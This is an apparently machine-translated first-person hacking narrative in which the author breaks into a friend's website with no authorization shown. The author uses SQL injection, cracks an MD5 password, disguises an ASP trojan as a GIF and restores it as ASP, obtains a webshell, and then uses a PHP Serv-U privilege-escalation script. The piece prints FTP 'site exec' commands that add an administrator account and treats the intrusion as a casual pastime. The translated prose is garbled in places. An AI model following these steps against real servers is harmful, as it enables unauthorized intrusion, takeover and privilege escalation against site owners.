Serv-U.php: light in the dark

These days are boring and there is nothing to do. It happens that a new website has been launched by a friend. Let me check it and test the security of the website.

First, I looked at the website structure and layout. I felt that the whole site program was used as a whole. I analyzed it in detail. I guess it may be FreePower3.6. I am still familiar with it. Another forum is LeadBBS, "Enemy situation" first checks this and starts work!

TIPS: it is very important to collect information before intrusion. It helps you decide the process and idea of intrusion.

Ping the IP address of the target website. When this IP address is opened in IE, it is another page, which is estimated to be a VM. In the http://whois.webhosting.info on this site to query the IP address bound to 78 domain names, good guy, really much ah, to other sites to turn, most of the ASP site, there is a small number of PHP. I originally wanted to conduct cross-site attacks through other websites, but I am not good at the level of cooking, and I am not good at the foundation. I am not good at it.

First, we found the connection on the website:

Http://www.xxxxx.com/Article_Show.asp? ArticleID = 7

I felt that there was a problem. I added a semicolon to display the error page. I changed it to the DoT number and the page was displayed normally. It indicates that there may be an SQL injection vulnerability. Use a tool for injection. Open nb_2, fill in the injection page address, and the injection vulnerability is not detected. Then, write the ID in the feature character to detect the vulnerability again,

In turn, the username and md5 encrypted password are cracked, and the password obtained by running MD5 is kignpl.

As there is a ready-made background management address on the home page, it saves the trouble of searching. After entering the background directly, I began to upload my ASP Trojan and carefully looked at each function. Although the upload file management cannot be used, the article management can be used. In the local environment, change the ASP Trojan of Haiyang 2005 to a GIF file, and then upload the file in article management, prompting that the relative address of the file after the upload is successful is "uploadfiles/2005-2/2005217193345303. gif ", but how can I turn it into an ASP file? I am stuck again and depressed! I suddenly remember that Yu Yi introduced how to use backup to restore the database to deal with the problem that DVBBS cannot upload ASP files. This is exactly for me! Find the Database Management Section and restore the uploaded GIF file to an ASP file ,.

The trojan address is http://www.xxxxx.com/database/8.asp. this is a bit of achievement. Log on to my lovely ASP Trojan and get WebShell. I roughly looked at the host information: IIS6.0, Windows Server 2003, and I am glad to support FSO, this is my first time!

TIPS: FSO (File System Object) is a File operation control of Microsoft ASP. It can read, create, modify, and delete directories and files on the server, is a very useful control in ASP programming.

I wanted to stop it, but I saw everyone else escalate permissions in the magazine. Let's join in. After browsing in WebShell for a while, I found that when I browsed the C drive of this site, I actually imposed permission restrictions.

. Without CMD and WSH, the directory has no permission to execute the program. How can I mix them ......

With a depressing mood, I will try uploading again. I thought, you won't let me use CMD. I will upload it myself! Still failed! I can't upload the latest extension. exeinto A 1.gif file. I can't change it to an HTM file! It's boring. In this case, no program can be run! I really want to give up. I can't write files or read files outside the website directory. In the past, the methods of experts were useless, and reverse connections were useless, let alone the NC and Trojan.

By the way, the port has not been checked! I quickly took out the SuperScan scan port, and the result left me desperate. I only opened ports 21 and 389. It is estimated that the other party has a firewall or a TCP/IP filter, port 389 is unfamiliar. Port 21 is the default port of the FTP service. How about connecting to the Banner? Maybe Serv-U?

Judging from the returned information, although it modified the FTP Server's Banner, it can be boldly guessed from the "user name okay, need password" sentence that it is Serv-U! Although I still don't know its version, there may be several ways to success. Try it!

After careful consideration, there are two ways to go: the first one is to penetrate through other sites on this IP address. I don't believe it. The 77 virtual hosts are all so BT, some user permissions should be more powerful, but it is easy to say that it is difficult to do, it is dark once again the next day I am a national treasure with two dark circles; the second is Serv-U, isn't it 21? So I picked up the remote overflow attack weapons of my predecessors and bombarded them in turn. However, 21 of the people's positions were rock-solid and desperate ......

Think about it: isn't the server supporting PHP scripts (this IP address has a PHP website )? Although my permissions are very small, it is not useless. I cannot upload an EXE file. I have a PHP file, but I can still parse it normally! Upload a PHP Trojan quickly. Unfortunately, the permissions of the PHP Trojan are also very low. Like the ASP Trojan, there are almost no useful permissions. But this inspired me: if a PHP script can improve the local permissions of Serv-U, will it be successful? I don't know the PHP language, but I can't compile it myself. I went to the Internet to find it. Unfortunately, I didn't find a suitable one. Later, I told Yu Yi about this idea. He said that he had such a script. I took it back and checked it out. Isn't that exactly what I want? Haha, it seems like it's going to be clear.

Upload it to the Web directory at http://www.xxxxx.com/database/servu.php. Then I changed it to servu.php. Run directly in IE.

We only need to add a Super User to Serv-U! Let's talk about how to use it: Fill in the Host IP address to provide the server address of the virtual host; modify the host FTP Management port according to the situation; Add the user name and password as per your preferences, the default value is wofeiwo, And the password is wrsky. The main directory of the user is C :\. Others do not need to be modified.

Okay. After I modify the IP address, user name, and password according to my situation, click the Add button. The Serv-U Local Privilege Escalation script will be parsed and executed on the server, it takes some time and is a little slow. After the scroll bar is finished, the execution is successful. A Serv-U user admim will be added. The password is admim and its permission is system, there is a command execution echo in the box, and my echo is (the following information is basically successfully executed ):

220 Serv-u ftp Server v5.2 for WinSock ready...

331 User name okay, need password.

230 User logged in, proceed.

230-Switching to system maintenance mode.

230 Version = 1

900-Type = Status

900 Server = Online

900-Type = License

900-DaysLeft = 0

......

900 MinorVersion = 0

200-User = admim

200 User settings saved

Note that, because I cannot check the real port opened by the host after the firewall (if any ), so I assume that its local Serv-U Management port has not been modified, which is a bit confusing. Haha! Successful! Yes, Serv-U 5.2. Even versions are displayed! It turned out to be a bid!

Now the situation is clear: directly log on to FTP, switch the directory to system32, and then run the following command to add the user "mdj: Quote site exec net.exe user mdj 123456/add"

What's going on? An error occurred while executing the command:

Ftp & gt; quote site exec net.exe user mdj 123456/add

501 Cannot EXEC command line (error = 0)

After careful consideration, the existence of net.exe indicates that the Administrator may restrict access to the net file, and the same is true for testing cmd. In this case, upload net.exe, change the name to 200.exe, and then run the Add administrator user command.

Command executed successfully! It indicates that you have the system administrator privilege! You can use Serv-U for remote management, and upload Trojans-free. Everyone is an expert. I will not talk nonsense here, and it will end when it comes to penetration.

The Serv-U.php is common to all Serv-U versions, and I am still a small user privilege for the Local Privilege Escalation tool, it can be seen that it played a crucial role in this Penetration Process. Currently, some servers allow the execution of programs, so you can upload an exe with the Serv-U permission! However, if you encounter the same or similar situation in Web testing, you may wish to try this script, which will surprise you! Thank you for your support!